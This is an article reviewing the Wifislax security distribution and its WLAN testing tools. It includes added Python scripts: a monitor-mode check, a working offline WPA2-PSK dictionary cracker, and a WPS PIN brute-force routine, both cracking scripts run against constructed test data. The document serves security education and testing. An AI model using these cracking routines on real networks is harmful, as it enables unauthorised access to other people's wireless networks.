Detecting vulnerabilities in the WLAN with Wifislax

Overview

Many analysis programs, such as Angry IP Scanner, Etherape, Iptraf, Net Activity Viewer, Wireshark, and Zenmap, are available in the Wifislax | Network Tools menu to give you an overview of your network.

These tools not only visualize the local network graphically but also provide the first indications of malicious or unusual traffic. With the well-known sniffing tool Ettercap, you can also record data transmissions on the internal network, including passwords that insecure protocols send in cleartext.

The Hping3, Mdk3, and Yersinia programs probe firewalls, clients, servers, or routers for weak spots using packet-crafting and flooding techniques. Yersinia also implements known attacks against Layer 2 protocols such as STP, CDP, and DHCP, which reveals configuration deficits on the switches and servers that speak them.

Applications such as Medusa and Hydra are dedicated to attacking passwords and authentication mechanisms. Using dictionary attacks, these tools try login after login against a network service until one succeeds; the passwords are guessed online, not decrypted. In Wifislax, Medusa is aimed primarily at the WLAN router's login. Most of the wireless tools described in the following sections, however, only work if you switch the computer's WLAN card into monitor mode, in which it captures every frame on the channel rather than only those addressed to it. You can do this at the command line with airmon-ng: Called without any parameters, it lists the wireless interfaces it finds, together with their driver and chipset. If the adapter is not yet in monitor mode, enter airmon-ng start <Adapter> (Figure 3); depending on the driver and the aircrack-ng version, the monitor interface appears under a new name such as wlan0mon or mon0. If a network manager keeps resetting the card, run airmon-ng check kill first to stop the interfering processes.

Figure 3: The terminal command airmon-ng switches the WLAN card to monitor mode.
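Before handing an interface to the sniffing tools it pays to verify that it really ended up in monitor mode, because a driver that silently refuses the switch leaves you capturing nothing. The following Python script is an added example, not code from the original article or from the Wifislax project: it parses the output of iw dev (the tool airmon-ng drives behind the scenes) and reports the operating type of each interface. The sample output embedded in the script is constructed; the interface names wlan0mon and wlan1 and the live_iw_dev() helper are assumptions for the example.

```python
"""Pre-flight check: confirm a wireless interface is really in monitor mode.

airmon-ng calls iw(8) behind the scenes, and `iw dev` reports the operating
type of every wireless interface. This parser turns that text into a dict so
a capture script can refuse to start on an interface that is still "managed".
"""
import subprocess

# Constructed sample of `iw dev` output after `airmon-ng start wlan0` on a
# driver that renames the interface to wlan0mon (older airmon-ng builds add
# a separate mon0 instead; the names are assumptions for this example).
SAMPLE_IW_DEV = """\
phy#0
\tInterface wlan0mon
\t\tifindex 4
\t\twdev 0x2
\t\taddr 00:11:22:33:44:55
\t\ttype monitor
\t\tchannel 6 (2437 MHz), width: 20 MHz, center1: 2437 MHz
\t\ttxpower 20.00 dBm
phy#1
\tInterface wlan1
\t\tifindex 5
\t\twdev 0x100000001
\t\taddr 66:77:88:99:aa:bb
\t\tssid HomeNet
\t\ttype managed
\t\tchannel 11 (2462 MHz), width: 20 MHz, center1: 2462 MHz
"""


def interface_types(iw_dev_text: str) -> dict:
    """Map interface name -> type ('monitor', 'managed', 'AP', ...)."""
    types = {}
    current = None
    for line in iw_dev_text.splitlines():
        fields = line.split()
        if len(fields) >= 2 and fields[0] == "Interface":
            current = fields[1]          # a new "Interface <name>" block starts
        elif len(fields) >= 2 and fields[0] == "type" and current is not None:
            types[current] = fields[1]   # the "type <mode>" line of that block
    return types


def monitor_interfaces(iw_dev_text: str) -> list:
    """Names of all interfaces currently in monitor mode, sorted."""
    return sorted(name for name, t in interface_types(iw_dev_text).items()
                  if t == "monitor")


def is_monitor(iface: str, iw_dev_text: str) -> bool:
    """True only if iface exists and reports type monitor."""
    return interface_types(iw_dev_text).get(iface) == "monitor"


def live_iw_dev() -> str:
    """Read the real `iw dev` output (Linux only; needs iw installed and root)."""
    return subprocess.run(["iw", "dev"], capture_output=True, text=True,
                          check=True).stdout


if __name__ == "__main__":
    # Use live_iw_dev() instead of the sample on a Wifislax box.
    print("monitor interfaces:", monitor_interfaces(SAMPLE_IW_DEV))
    for name in ("wlan0mon", "wlan1"):
        state = "ready" if is_monitor(name, SAMPLE_IW_DEV) else "NOT in monitor mode"
        print(f"{name}: {state}")
```

Replace SAMPLE_IW_DEV with live_iw_dev() on the target machine; if is_monitor() returns False for the interface you intend to sniff on, repeat airmon-ng check kill and airmon-ng start <Adapter> before launching any of the tools below.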

You will also find tools that use dictionary attacks in the Decrypters menu. The menu groups the tools by country and also takes specific hardware into account. For example, special scripts are available for the providers Alice and Vodafone; they target the routers supplied by these providers and probe them for known security vulnerabilities. The scripts that examine WLAN routers from manufacturers such as D-Link or TP-Link for gaps in their authentication are more vendor-neutral in their approach.

Additionally, other tools work independently of manufacturer and device. You can find them in the Suite aircrack-ng, Wireless, and Wpa submenus. The Aircrack suite offers extensive opportunities for sniffing data traffic on a WLAN; it can also recover WEP keys statistically from enough captured traffic and WPA/WPA2 pre-shared keys from a captured four-way handshake using dictionary and brute-force attacks. Tools in the Aircrack suite can also decrypt recorded data streams that have been "secured" with a WEP or WPA key, provided that the key is known.
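What a WPA/WPA2 dictionary attack actually computes is worth seeing once in code, because it explains both why a captured handshake is needed and why the attack is slow. The following Python script is an added example, not code from the original article, the Wifislax project, or aircrack-ng: it derives the PMK from each candidate passphrase with PBKDF2, expands it to the PTK with the two MAC addresses and two nonces from the handshake, and compares the MIC of EAPOL message 2 with the captured one. The handshake here is a constructed, self-consistent fixture (the MIC is computed from the real passphrase so there is something to match; in practice all of it comes from a pcap), the MAC addresses, nonces, and wordlist are assumptions, and the SSID "IEEE"/passphrase "password" pair is the published IEEE 802.11 test vector for the PMK.

```python
"""Offline dictionary attack on a WPA2-PSK four-way handshake.

Per candidate: PMK = PBKDF2(passphrase, SSID), PTK = PRF-512(PMK, MACs, nonces),
MIC = HMAC-SHA1(KCK, EAPOL frame)[:16]. A match on the MIC of message 2 proves
the candidate is the pre-shared key. The 4096 PBKDF2 rounds are the cost.
"""
import hashlib
import hmac

MIC_OFFSET = 81  # byte offset of the Key MIC field inside an EAPOL-Key frame


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
            anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512 'Pairwise key expansion'; returns the 64-byte PTK."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Key descriptor version 2 (WPA2): HMAC-SHA1 over the frame with the MIC
    field zeroed, truncated to 16 bytes. KCK is the first 16 bytes of the PTK."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(handshake: dict, wordlist):
    """Return the first passphrase whose MIC matches the captured one, else None."""
    for word in wordlist:
        ptk = wpa_ptk(wpa_pmk(word, handshake["ssid"]), handshake["ap_mac"],
                      handshake["sta_mac"], handshake["anonce"], handshake["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], handshake["eapol"]), handshake["mic"]):
            return word
    return None


def build_eapol_msg2(snonce: bytes) -> bytes:
    """Constructed skeleton of EAPOL-Key message 2 (no RSN IE), MIC zeroed."""
    body = (b"\x02"                      # descriptor type: RSN
            + b"\x01\x0a"                # key info: version 2, pairwise, MIC
            + b"\x00\x10"                # key length
            + b"\x00" * 7 + b"\x01"      # replay counter
            + snonce                     # key nonce (SNonce)
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # IV, RSC, ID
            + b"\x00" * 16               # key MIC, filled in by the supplicant
            + b"\x00\x00")               # key data length
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


SSID = "IEEE"
REAL_PASSPHRASE = "password"   # IEEE 802.11 PMK test vector pair with SSID "IEEE"
WORDLIST = ["letmein", "Password1", "password", "12345678"]   # assumed wordlist


def constructed_handshake() -> dict:
    """Self-consistent fixture standing in for a captured handshake (assumed values)."""
    ap_mac = bytes.fromhex("001122334455")
    sta_mac = bytes.fromhex("66778899aabb")
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    eapol = build_eapol_msg2(snonce)
    ptk = wpa_ptk(wpa_pmk(REAL_PASSPHRASE, SSID), ap_mac, sta_mac, anonce, snonce)
    return {"ssid": SSID, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": eapol_mic(ptk[:16], eapol)}


if __name__ == "__main__":
    print("PMK(password, IEEE) =", wpa_pmk("password", "IEEE").hex())
    print("recovered passphrase:", crack(constructed_handshake(), WORDLIST))
```

The check of the MIC is the only thing the attacker can verify offline, which is why the Wpa menu's handshake recorders matter: without message 2 of a handshake there is nothing to compare candidates against, and each candidate still costs a full PBKDF2 run.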

The Wireless and Wpa menus offer additional analysis tools, again a mixture of command-line programs and tools with a graphical user interface. The focus of these utilities is also on finding and testing WLAN networks.

Lesser-known software, such as Wifi Metropolis, Minidwep-gtk (Figure 4), and GOYscript, is included, as well as the standard WLAN sniffer Kismet. The Wpa menu also includes several programs for recording WPA handshakes, such as Autohs GUI, coWPAtty, and HandShaker.

Figure 4: Minidwep gives you a quick overview of WLANs in your area.

Many newer devices join a WLAN via WPS (WiFi Protected Setup) without the user having to enter the key. Authentication is usually performed with an eight-digit PIN. This method has serious security vulnerabilities: the last digit is only a checksum, and the access point acknowledges the two halves of the PIN separately, so an attacker needs at most about 11,000 attempts rather than 10 million. The Wifislax developers implemented their own Wpa wps submenu in order to detect these weak points on the WLAN. It contains software for finding WPS-enabled access points, testing PINs, and generating candidate PIN codes.
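The PIN arithmetic behind those vulnerabilities fits in a few lines. The following Python script is an added example, not code from the original article, the Wifislax project, or any of the tools in the Wpa wps menu: it implements the WPS checksum digit, completes a seven-digit prefix into a valid PIN (what the menu's PIN generators do with vendor-derived candidates), and runs the half-by-half search against a simulated registrar to count how many attempts it takes. The simulated registrar and the PIN 12345670 are constructed for the example; no real access point is involved.

```python
"""Why WPS PIN authentication is weak, shown with the PIN arithmetic.

The 8-digit PIN carries only 7 digits of entropy because the last digit is a
checksum. Worse, the registrar exchange rejects a wrong first half after M4 and
a wrong second half after M6, so each half can be confirmed on its own:
at most 10^4 + 10^3 = 11,000 attempts instead of 10^7.
"""


def wps_checksum(first_seven: int) -> int:
    """Checksum digit as defined by the WPS specification (same algorithm as hostapd)."""
    accum = 0
    pin = first_seven
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True if the 8-digit string has the correct checksum digit."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


def generate_pin(first_seven: str) -> str:
    """Complete a 7-digit prefix (e.g. a vendor-derived candidate) into a valid PIN."""
    return f"{int(first_seven):07d}{wps_checksum(int(first_seven))}"


class SimulatedRegistrar:
    """Models an AP's PIN check for an external registrar: NACK after M4 if the
    first four digits are wrong, NACK after M6 if the last four are wrong.
    Constructed for this example; it talks to no real device."""

    def __init__(self, pin: str):
        self.pin = pin
        self.attempts = 0

    def try_pin(self, candidate: str) -> str:
        self.attempts += 1
        if candidate[:4] != self.pin[:4]:
            return "NACK@M4"
        if candidate[4:] != self.pin[4:]:
            return "NACK@M6"
        return "M7"


def recover_pin(ap: SimulatedRegistrar):
    """Half-by-half brute force; returns (pin, attempts) or (None, attempts)."""
    first = None
    for a in range(10_000):                    # first half: 4 free digits
        cand = f"{a:04d}"
        if ap.try_pin(cand + "0000") != "NACK@M4":
            first = cand                       # M4 passed: first half confirmed
            break
    if first is None:
        return None, ap.attempts
    for b in range(1_000):                     # second half: 3 free digits + checksum
        pin = generate_pin(first + f"{b:03d}")
        if ap.try_pin(pin) == "M7":
            return pin, ap.attempts
    return None, ap.attempts


if __name__ == "__main__":
    print("12345670 valid:", is_valid_pin("12345670"))
    print("recovered:", recover_pin(SimulatedRegistrar("12345670")))
```

On a real access point the same search is rate-limited only by the AP's own lockout policy, which is why the tools in this submenu first check whether WPS is enabled at all.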

Additional Software

Wifislax may focus on network security, but it also provides several applications for data recovery. These include the programs TestDisk and QPhotoRec in the System | Repair & Recover Tools menu. For forensic tasks, under Wifislax | Forensics you will also find useful programs such as Dumpzilla, which extracts history, cookies, and other artifacts from Firefox profiles, and Grampus, which extracts metadata from documents.

If you are missing an application, you can install it using the package management system. Wifislax uses Slackware package management and, in the form of Gslapt under System | Wifislax packets administrator, also provides a graphical front end for software installation that is strongly reminiscent of Synaptic. You will also find a converter that turns third-party packages into the XZM module format that Wifislax itself uses for its live system (Figure 5).

Figure 5: Wifislax uses the Slackware package management system, which you can access via Gslapt.

Conclusions

Wifislax offers a good selection of testing tools with which you can quickly track down security vulnerabilities in virtually all common WLAN scenarios. In addition, the distribution can also recover data. The cumbersome installation wizard and the incomplete localization of some programs are both areas for improvement.
